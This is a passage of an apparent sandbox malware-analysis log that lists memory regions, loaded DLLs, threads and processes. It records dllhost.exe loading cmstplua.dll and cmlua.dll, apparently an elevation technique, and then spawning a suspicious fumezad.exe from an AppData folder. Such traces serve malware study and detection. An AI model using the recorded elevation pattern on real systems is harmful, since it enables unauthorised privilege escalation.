end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2042 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2043 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2044 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2045 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2046 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2047 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2048 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2049 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2050 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2051 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2052 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2053 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2054 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2055 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2056 start_va = 0x7fee3490000 end_va = 0x7fee34a1fff entry_point = 0x7fee3490000 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Thread: id = 132 os_tid = 0x5d8 Thread: id = 133 os_tid = 0x314 Thread: id = 134 os_tid = 0x690 Thread: id = 135 os_tid = 0x8a0 Thread: id = 136 os_tid = 0x89c Thread: id = 137 os_tid = 0x95c Thread: id = 138 os_tid = 0x72c Process: id = "14" image_name = "dllhost.exe" filename = "c:\\windows\\syswow64\\dllhost.exe" page_root = "0x3e717000" os_pid = "0x5d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x8bc" cmd_line = "C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2066 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2067 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2068 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2069 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2070 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2071 start_va = 0x60000 end_va = 0xc6fff entry_point = 0x60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2072 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2073 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2074 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2075 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2076 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2077 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 2078 start_va = 0x240000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2079 start_va = 0x280000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 2080 start_va = 0x450000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2081 start_va = 0x4d0000 end_va = 0x650fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 2082 start_va = 0x660000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2083 start_va = 0x6a0000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 2084 start_va = 0x7b0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 2085 start_va = 0x7f0000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 2086 start_va = 0x860000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 2087 start_va = 0x8a0000 end_va = 0xb6efff entry_point = 0x8a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2088 start_va = 0xbe0000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 2089 start_va = 0xc40000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 2090 start_va = 0xcc0000 end_va = 0xcc4fff entry_point = 0xcc0000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\SysWOW64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe") Region: id = 2091 start_va = 0xcd0000 end_va = 0x20cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 2092 start_va = 0x20d0000 end_va = 0x210ffff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 2093 start_va = 0x21d0000 end_va = 0x220ffff entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 2094 start_va = 0x2210000 end_va = 0x22eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002210000" filename = "" Region: id = 2095 start_va = 0x2370000 end_va = 0x23affff entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 2096 start_va = 0x747c0000 end_va = 0x747cbfff entry_point = 0x747c0000 region_type = mapped_file name = "cmlua.dll" filename = "\\Windows\\SysWOW64\\cmlua.dll" (normalized: "c:\\windows\\syswow64\\cmlua.dll") Region: id = 2097 start_va = 0x749b0000 end_va = 0x749bdfff entry_point = 0x749b0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 2098 start_va = 0x749c0000 end_va = 0x749fafff entry_point = 0x749c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2099 start_va = 0x74a00000 end_va = 0x74a0dfff entry_point = 0x74a00000 region_type = mapped_file name = "cmutil.dll" filename = "\\Windows\\SysWOW64\\cmutil.dll" (normalized: "c:\\windows\\syswow64\\cmutil.dll") Region: id = 2100 start_va = 0x74a10000 end_va = 0x74a17fff entry_point = 0x74a10000 region_type = mapped_file name = "cmstplua.dll" filename = "\\Windows\\SysWOW64\\cmstplua.dll" (normalized: "c:\\windows\\syswow64\\cmstplua.dll") Region: id = 2101 start_va = 0x74a20000 end_va = 0x74a28fff entry_point = 0x74a20000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2102 start_va = 0x74bb0000 end_va = 0x74bc5fff entry_point = 0x74bb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2103 start_va = 0x75050000 end_va = 0x750cffff entry_point = 0x75050000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2104 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2105 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2106 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2107 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2108 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2109 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2110 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2111 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2112 start_va = 0x75540000 end_va = 0x755cefff entry_point = 0x75540000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2113 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2114 start_va = 0x75660000 end_va = 0x756b6fff entry_point = 0x75660000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2115 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2116 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2117 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2118 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2119 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2120 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2121 start_va = 0x76160000 end_va = 0x762bbfff entry_point = 0x76160000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2122 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2123 start_va = 0x764b0000 end_va = 0x76532fff entry_point = 0x764b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2124 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2125 start_va = 0x76770000 end_va = 0x773b9fff entry_point = 0x76770000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2126 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 2127 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 2128 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2129 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2130 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2131 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2132 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2133 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2134 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2135 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2136 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2137 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2138 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2139 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2140 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2141 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2142 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2143 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2144 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2145 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2146 start_va = 0xb90000 end_va = 0xbcffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 2147 start_va = 0x2160000 end_va = 0x219ffff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 2148 start_va = 0x74a80000 end_va = 0x74aa0fff entry_point = 0x74a80000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 2149 start_va = 0x74ab0000 end_va = 0x74ba4fff entry_point = 0x74ab0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 2150 start_va = 0x74bd0000 end_va = 0x74d6dfff entry_point = 0x74bd0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2151 start_va = 0x75b10000 end_va = 0x75b54fff entry_point = 0x75b10000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 2152 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 2153 start_va = 0x1b0000 end_va = 0x1cffff entry_point = 0x1b0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 2154 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 2155 start_va = 0x74d70000 end_va = 0x74d7afff entry_point = 0x74d70000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2156 start_va = 0x190000 end_va = 0x193fff entry_point = 0x190000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2157 start_va = 0x220000 end_va = 0x223fff entry_point = 0x220000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2158 start_va = 0x410000 end_va = 0x43ffff entry_point = 0x410000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 2159 start_va = 0x22f0000 end_va = 0x2355fff entry_point = 0x22f0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2160 start_va = 0x23b0000 end_va = 0x24affff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 2161 start_va = 0x74a30000 end_va = 0x74a7bfff entry_point = 0x74a30000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2162 start_va = 0x75520000 end_va = 0x75531fff entry_point = 0x75520000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2163 start_va = 0x75d70000 end_va = 0x75f0cfff entry_point = 0x75d70000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2164 start_va = 0x762c0000 end_va = 0x762e6fff entry_point = 0x762c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2165 start_va = 0x440000 end_va = 0x446fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2166 start_va = 0x7a0000 end_va = 0x7a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 2167 start_va = 0x24b0000 end_va = 0x28a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 2168 start_va = 0x74790000 end_va = 0x747bdfff entry_point = 0x74790000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 2169 start_va = 0x75740000 end_va = 0x75875fff entry_point = 0x75740000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2170 start_va = 0x759e0000 end_va = 0x759ebfff entry_point = 0x759e0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2171 start_va = 0x75a10000 end_va = 0x75b04fff entry_point = 0x75a10000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2172 start_va = 0x75f10000 end_va = 0x7610afff entry_point = 0x75f10000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2173 start_va = 0x76650000 end_va = 0x7676cfff entry_point = 0x76650000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Thread: id = 139 os_tid = 0x1cc Thread: id = 140 os_tid = 0x76c Thread: id = 141 os_tid = 0x6d4 Thread: id = 142 os_tid = 0x20c Thread: id = 143 os_tid = 0x40c Thread: id = 144 os_tid = 0x5cc Thread: id = 145 os_tid = 0x2c8 Thread: id = 146 os_tid = 0x6c4 Thread: id = 147 os_tid = 0x480 Process: id = "15" image_name = "fumezad.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe" page_root = "0x400c0000" os_pid = "0x240" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x5d4" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2174 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2175 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2176 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2177 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2178 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2179 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2180 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2181 start_va = 0x400000 end_va = 0x479fff entry_point = 0x400000 region_type = mapped_file name = "fumezad.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe") Region: id = 2182 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2183 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2184 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2185 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2186 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2187 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2188 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2189 start_va = 0x7ffe0000 end_va = 0x7ffeffff 